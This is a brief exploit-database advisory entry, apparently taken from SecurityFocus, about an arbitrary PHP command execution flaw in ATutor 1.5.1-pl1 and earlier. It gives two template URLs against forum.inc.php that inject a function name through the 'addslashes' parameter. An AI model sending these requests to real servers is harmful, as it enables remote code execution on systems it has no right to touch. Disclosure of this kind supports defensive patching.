ATutor 1.x - forum.inc.php Arbitrary Command Execution

2005-10-27T00:00:00
ID EXPLOITPACK:7AFCAFCE732B3CD4C3031629190F699E
Type exploitpack
Reporter Andreas Sandblad
Modified 2005-10-27T00:00:00

Description

ATutor 1.x - forum.inc.php Arbitrary Command Execution

                                        
                                            source: https://www.securityfocus.com/bid/15221/info

ATutor is prone to multiple vulnerabilities.

These issues can allow remote attackers to execute arbitrary PHP commands and carry out local file include and cross-site scripting attacks.

ATutor 1.5.1-pl1 and prior versions are affected. 

http://www.example.com/include/html/forum.inc.php?addslashes=[function]&asc=[parameter]
http://www.example.com/include/html/forum.inc.php?addslashes=[function]&desc=[parameter]